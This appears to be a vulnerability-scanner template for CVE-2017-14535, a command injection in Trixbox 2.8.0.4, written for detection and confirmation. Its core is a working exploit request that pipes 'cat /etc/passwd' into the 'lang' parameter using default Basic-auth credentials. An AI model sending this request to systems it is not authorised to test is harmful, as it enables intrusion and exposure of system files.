id: CVE-2017-14535 info: name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability author: pikpikcu severity: high reference: | - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://www.exploit-db.com/exploits/49913 tags: cve,cve2017,trixbox,rce requests: - raw: - | GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= Connection: close Cache-Control: max-age=0 matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200